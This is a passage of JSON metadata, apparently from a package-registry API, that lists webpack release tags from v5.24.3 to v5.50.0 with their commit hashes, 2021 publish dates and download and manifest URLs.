31:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.50.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.50.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.50.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.50.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.50.0/manifests"},{"name":"v5.49.0","sha":"d3868384c37f9d674d1db17a0198393bd213c763","kind":"tag","published_at":"2021-08-06T11:07:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.49.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.49.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.49.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.49.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.49.0/manifests"},{"name":"v5.48.0","sha":"67f3aef3c11e2a8d9e7dc1e0300350588ebd7aec","kind":"tag","published_at":"2021-08-02T12:36:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.48.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.48.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.48.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.48.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.48.0/manifests"},{"name":"v5.47.1","sha":"3f353b6ae29ae6d96e0ab86e7233b4c785f99c60","kind":"tag","published_at":"2021-07-29T14:19:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.47.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.47.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.47.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.1/manifests"},{"name":"v5.47.0","sha":"efeb1287e52870036cc01b22476852205e99c31a","kind":"tag","published_at":"2021-07-27T14:27:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.47.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.47.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.47.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.0/manifests"},{"name":"v5.46.0","sha":"a32b0fd041260f3303b9329c9a65cc4afe102390","kind":"tag","published_at":"2021-07-22T10:14:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.46.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.46.0/manifests"},{"name":"v5.45.1","sha":"7102df3bb52a33529ff5db4fdf34484d2a359a49","kind":"tag","published_at":"2021-07-16T20:09:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.45.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.45.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.45.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.1/manifests"},{"name":"v5.45.0","sha":"db52c58a4fb037ece22be6365f56c11bc78fb426","kind":"tag","published_at":"2021-07-16T15:50:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.45.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.0/manifests"},{"name":"v5.44.0","sha":"f20158d4492e73d07a36cd1614dfbd1dc1ea143d","kind":"tag","published_at":"2021-07-08T19:37:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.44.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.44.0/manifests"},{"name":"v5.43.0","sha":"b53a06437a3e8b2756c550c1be6ccb33fdba03d7","kind":"tag","published_at":"2021-07-06T19:07:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.43.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.43.0/manifests"},{"name":"v5.42.1","sha":"4156b20644d309c0e8acaa1e22ca3a4fe546c0b6","kind":"tag","published_at":"2021-07-05T14:05:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.42.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.1/manifests"},{"name":"v5.42.0","sha":"4fb45402eec7efe1c70e641cab7b24331948ea8d","kind":"tag","published_at":"2021-07-02T07:04:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.42.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.0/manifests"},{"name":"v5.41.1","sha":"9ed05afbeaf87442d86863a20a6c30b0ab437fb5","kind":"tag","published_at":"2021-06-29T14:30:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.41.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.1/manifests"},{"name":"v5.41.0","sha":"fd5dc9997671b4c4b32d15f722e06079cd5da2db","kind":"tag","published_at":"2021-06-28T16:23:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.41.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.0/manifests"},{"name":"v5.40.0","sha":"5d297327bc1f208de16c29f5c9b31d2b8a06bce4","kind":"tag","published_at":"2021-06-21T16:25:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.40.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.40.0/manifests"},{"name":"v5.39.1","sha":"e5ccd070f6c18794173d3f2e60445de5bc2f52a2","kind":"tag","published_at":"2021-06-17T10:21:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.39.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.1/manifests"},{"name":"v5.39.0","sha":"e9f90450d5d8b4e796e5e0e9674869220ab73bcb","kind":"tag","published_at":"2021-06-14T21:31:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.39.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.0/manifests"},{"name":"v5.38.1","sha":"487665cb69f7b1f1aac44097124ef8f33cfe247b","kind":"tag","published_at":"2021-05-27T21:12:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.38.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.38.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.38.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.1/manifests"},{"name":"v5.38.0","sha":"daa0f1ed1cebc28c8cc9034f95f3b56e9253ec5e","kind":"tag","published_at":"2021-05-27T12:41:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.38.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.0/manifests"},{"name":"v5.37.1","sha":"2a5ed4a2dcbe06e852f84a8e7f63145af87cb139","kind":"tag","published_at":"2021-05-19T06:50:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.37.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.1/manifests"},{"name":"v5.37.0","sha":"a5821c74568d59a330043900328a018c5d3a4af7","kind":"tag","published_at":"2021-05-10T16:21:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.37.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.0/manifests"},{"name":"v5.36.2","sha":"0e2e972a2d181c530bb7185278fe5cfc20724c22","kind":"tag","published_at":"2021-04-30T11:48:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.36.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.36.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.36.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.2/manifests"},{"name":"v5.36.1","sha":"e9de77aae42bd8f7d799a21dd16c98206cd170f6","kind":"tag","published_at":"2021-04-28T18:57:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.36.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.1/manifests"},{"name":"v5.36.0","sha":"c0a3394ae059ba30c90b7e84c3805dcfd918577d","kind":"tag","published_at":"2021-04-27T09:44:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.36.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.0/manifests"},{"name":"v5.35.1","sha":"ed175cd22f89eb9fecd0a70572a3fd0be028e77c","kind":"tag","published_at":"2021-04-23T18:36:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.35.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.1/manifests"},{"name":"v5.35.0","sha":"e05935f8969d873a20762767d348256e5ad8fb46","kind":"tag","published_at":"2021-04-21T06:37:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.35.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.0/manifests"},{"name":"v5.34.0","sha":"a52263b4537dc5bd954677fc884966b0c11114d4","kind":"tag","published_at":"2021-04-19T14:42:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.34.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.34.0/manifests"},{"name":"v5.33.2","sha":"93ce24d2dc40ee972a2ea5138f3c181563c913fd","kind":"tag","published_at":"2021-04-14T18:31:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.33.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.33.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.33.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.2/manifests"},{"name":"v5.33.1","sha":"7a7d3be25a3db94cb47923d122513726966025cf","kind":"tag","published_at":"2021-04-14T18:08:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.33.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.33.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.33.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.1/manifests"},{"name":"v5.33.0","sha":"7ee3bab88a5f38d4a6356baf93a8c9dfb901b9dc","kind":"tag","published_at":"2021-04-14T17:28:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.33.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.0/manifests"},{"name":"v5.32.0","sha":"932950550c85dce4efcaccd7116b4879bfd5f962","kind":"tag","published_at":"2021-04-12T18:54:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.32.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.32.0/manifests"},{"name":"v5.31.2","sha":"cde1b73e12eb8a77eb9ba42e7920c9ec5d29c2c9","kind":"tag","published_at":"2021-04-09T17:52:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.31.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.2/manifests"},{"name":"v5.31.1","sha":"34502650252c1f5e2b6e19f3d5afd1fac96f3ec4","kind":"tag","published_at":"2021-04-09T17:07:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.31.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.1/manifests"},{"name":"v5.31.0","sha":"b3e26cb5a81087c1b4eadb2e648eb01928c9b3be","kind":"tag","published_at":"2021-04-07T16:39:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.31.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.0/manifests"},{"name":"v5.30.0","sha":"f3dce69e9df5f778fb4850662b0f16f9fd9951d2","kind":"tag","published_at":"2021-04-01T18:45:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.30.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.30.0/manifests"},{"name":"v5.29.0","sha":"0522deb7618636b37acae64f5e3b581c7bbb8fca","kind":"tag","published_at":"2021-04-01T15:39:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.29.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.29.0/manifests"},{"name":"v5.28.0","sha":"15110ea6de0b53c93d697716d17037c41a3c0cd2","kind":"tag","published_at":"2021-03-24T12:35:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.28.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.28.0/manifests"},{"name":"v5.27.2","sha":"1c044bc75be02fcfe78eb6a291f2d107f8ac58eb","kind":"tag","published_at":"2021-03-22T14:40:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.27.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.27.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.27.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.2/manifests"},{"name":"v5.27.1","sha":"69d4e174b96f197ef5d9d8396edaa25178f22725","kind":"tag","published_at":"2021-03-20T19:39:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.27.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.1/manifests"},{"name":"v5.27.0","sha":"807e69d9647e8605daa815b6b24df8baebaa59b9","kind":"tag","published_at":"2021-03-19T16:46:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.27.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.0/manifests"},{"name":"v5.26.3","sha":"4ea8a435ace96cc6fe5c9b741bc14b68d75624a4","kind":"tag","published_at":"2021-03-17T13:38:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.3/manifests"},{"name":"v5.26.2","sha":"c67a73abbc3d3b333b31480bd7ac7a50e8b49e3e","kind":"tag","published_at":"2021-03-16T19:55:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.2/manifests"},{"name":"v5.26.1","sha":"ee09a9609bdebc25e52e785cef56f9698805599d","kind":"tag","published_at":"2021-03-16T14:13:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.1/manifests"},{"name":"v5.26.0","sha":"1def19ea8ab9921d1adaed30ba8f928badb133b5","kind":"tag","published_at":"2021-03-15T16:08:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.0/manifests"},{"name":"v5.25.1","sha":"58dfda2796edc57c9d18526053d6bcde6f06b8b7","kind":"tag","published_at":"2021-03-14T19:33:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.25.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.1/manifests"},{"name":"v5.25.0","sha":"be352e86b1c88893a62ffc2ada1c9294a016f5db","kind":"tag","published_at":"2021-03-12T07:49:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.25.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.0/manifests"},{"name":"v5.24.4","sha":"ef5e68141dc0fb6d02aa022194506cda878392c1","kind":"tag","published_at":"2021-03-08T09:56:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.4/manifests"},{"name":"v5.24.3","sha":"d044c857305fb48693bfa961bec3485d82ddef41","kind":"tag","published_at":"2021-03-03T19:07:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/we